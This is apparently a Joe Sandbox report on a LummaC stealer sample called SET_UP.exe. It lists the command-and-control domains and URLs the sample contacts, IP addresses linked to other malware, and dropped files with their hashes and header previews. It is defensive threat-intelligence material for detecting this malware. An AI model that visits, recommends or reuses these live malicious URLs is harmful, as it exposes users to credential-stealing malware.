                                                                                              https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cutefingeuker.click:443/apiSET_UP.exe, 00000000.00000002.2021753399.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://klipvumisui.shop/SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cutefingeuker.clGSSET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.tomabo.com/mp4-playerSET_UP.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crl.microSET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.microsofSET_UP.exe, 00000000.00000003.1861986622.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cutefingeuker.click/apigSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://ocsp.securetrust.com/0?SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cegu.shop/8574262446/ph.txtk9SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://www.tomabo.comSET_UP.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.tomabo.com/mp4-player/update.xmlSET_UP.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://dfgh.online/invoker.php?compName=hZpowershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.37.128 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | cutefingeuker.click | European Union | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584507
Start date and time: 2025-01-05 18:01:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SET_UP.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@59/13@3/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 53%
• Number of executed functions: 30
• Number of non-executed functions: 232
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BrightLib.exe, PID 7748 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7800 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:02:18 | API Interceptor | 10x Sleep call for process: SET_UP.exe modified
12:03:20 | API Interceptor | 1x Sleep call for process: BrightLib.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.37.128 | Full_Setup.exe | malicious | LummaC |
104.21.37.128 | Setup.exe | malicious | LummaC |
104.21.37.128 | Active_Setup.exe | malicious | LummaC Stealer |
104.21.37.128 | re5.mp4.hta | malicious | LummaC |
104.21.37.128 | Active_Setup.exe | malicious | LummaC |
104.21.37.128 | Set-up.exe | malicious | LummaC |
104.21.37.128 | #Setup.exe | malicious | LummaC |
104.21.37.128 | @Setup.exe | malicious | LummaC Stealer |
104.21.37.128 | installer_1.05_36.4.exe | malicious | LummaC Stealer |
104.21.37.128 | !Setup.exe | malicious | LummaC Stealer |
188.114.96.3 | Gg6wivFINd.exe | malicious | DCRat, PureLog Stealer, zgRAT | unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
188.114.96.3 | QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/u7ghXEYp/download
188.114.96.3 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.mffnow.info/1a34/
188.114.96.3 | A2028041200SD.exe | malicious | FormBook | www.mydreamdeal.click/1ag2/
188.114.96.3 | SWIFT COPY 0028_pdf.exe | malicious | FormBook | www.questmatch.pro/ipd6/
188.114.96.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/I7fmQg9d/download
188.114.96.3 | need quotations.exe | malicious | FormBook | www.rtpwslot888gol.sbs/jmkz/
188.114.96.3 | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/Bh1Kj4RD/download
188.114.96.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.96.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/XrlEIxYp/download
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Full_Setup.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | SET_UP.exe | malicious | LummaC |
185.161.251.21 | Setup.exe | malicious | LummaC |
185.161.251.21 | Active_Setup.exe | malicious | LummaC Stealer |
185.161.251.21 | Active_Setup.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Full_Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | SET_UP.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Active_Setup.exe | malicious | LummaC Stealer | 185.161.251.21
cegu.shop | Active_Setup.exe | malicious | LummaC | 185.161.251.21
klipvumisui.shop | Setup.exe | malicious | LummaC | 172.67.208.58
klipvumisui.shop | Full_Setup.exe | malicious | LummaC | 104.21.37.128
klipvumisui.shop | Setup.exe | malicious | LummaC |
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58
                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.37.128
                                                                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.208.58
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.208.58
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | 104.21.90.109
CLOUDFLARENETUS | Full_Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.196.191
CLOUDFLARENETUS | momo.spc.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
CLOUDFLARENETUS | momo.ppc.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
CLOUDFLARENETUS | momo.sh4.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
CLOUDFLARENETUS | momo.x86.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
CLOUDFLARENETUS | momo.m68k.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
CLOUDFLARENETUS | z0r0.sh4.elf | Get hash | malicious | Mirai | Browse | 172.71.176.132
CLOUDFLARENETUS | drop1.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.26.13.205
NTLGB | Setup.exe | Get hash | malicious | LummaC | Browse | 185.161.251.21
NTLGB | Setup.exe | Get hash | malicious | LummaC | Browse | 185.161.251.21
NTLGB | Full_Setup.exe | Get hash | malicious | LummaC | Browse | 185.161.251.21
NTLGB | momo.mips.elf | Get hash | malicious | Mirai | Browse | 82.18.222.135
NTLGB | momo.arm.elf | Get hash | malicious | Mirai | Browse | 82.17.192.171
NTLGB | momo.mpsl.elf | Get hash | malicious | Mirai | Browse | 82.128.104.220
NTLGB | momo.arm7.elf | Get hash | malicious | Mirai | Browse | 86.15.30.49
NTLGB | z0r0.m68k.elf | Get hash | malicious | Mirai | Browse | 86.17.1.179
NTLGB | z0r0.x86.elf | Get hash | malicious | Mirai | Browse | 81.99.50.70
NTLGB | z0r0.sh4.elf | Get hash | malicious | Mirai | Browse | 81.103.250.108
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Full_Setup.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | K27Yg4V48M.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | IH5XqCdf06.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | 3jL3mqtjCn.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC, PureLog Stealer | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | J18zxRjOes.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | ZxSWvC0Tz7.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | SOElePqvtf.exe | Get hash | malicious | LummaC | Browse | 104.21.37.128, 188.114.96.3, 185.161.251.21
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Full_Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Active_Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Set-up.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | #Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | installer_1.05_36.5.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | @Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | MdhO83N5Fm.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | Full_Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | qnUFsmyxMm.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | Active_Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | Set-up.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | #Setup.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | installer_1.05_36.5.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll | @Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.6599547231656377
Encrypted: false
SSDEEP: 3:Nllluly/:NllU
MD5: CD58C7193AF7B74B8F5AB012CEAA83D1
SHA1: 48F5F741531E2611CC155853BB9BFCF470AD2262
SHA-256: AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
SHA-512: B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
Malicious: false
Preview: @...e...........................................................

Process: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
File Type: PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 6447207
Entropy (8bit): 7.998441497232368
Encrypted: true
SSDEEP: 196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
MD5: B0CB3F07919BEB69B342ED871C6511A9
SHA1: C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
SHA-256: AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
SHA-512: 75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
Malicious: false
                                                                                                                                                                                                Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......
Process:C:\Users\user\Desktop\SET_UP.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):8767044
Entropy (8bit):7.960152326344281
Encrypted:false
SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
MD5:51F99EDDD33CC04FB0F55F873B76D907
SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:
• Filename: Setup.exe, Detection: malicious
• Filename: Full_Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Active_Setup.exe, Detection: malicious
• Filename: setup.exe, Detection: malicious
• Filename: Set-up.exe, Detection: malicious
• Filename: #Setup.exe, Detection: malicious
• Filename: installer_1.05_36.5.exe, Detection: malicious
• Filename: @Setup.exe, Detection: malicious
• Filename: MdhO83N5Fm.exe, Detection: malicious
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):35616
Entropy (8bit):6.953519176025623
Encrypted:false
SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Setup.exe, Detection: malicious
• Filename: Full_Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: qnUFsmyxMm.exe, Detection: malicious
• Filename: Active_Setup.exe, Detection: malicious
• Filename: setup.exe, Detection: malicious
• Filename: Set-up.exe, Detection: malicious
• Filename: #Setup.exe, Detection: malicious
• Filename: installer_1.05_36.5.exe, Detection: malicious
• Filename: @Setup.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.720366600008286
Encrypted:false
SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):35616
Entropy (8bit):6.953519176025623
Encrypted:false
SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
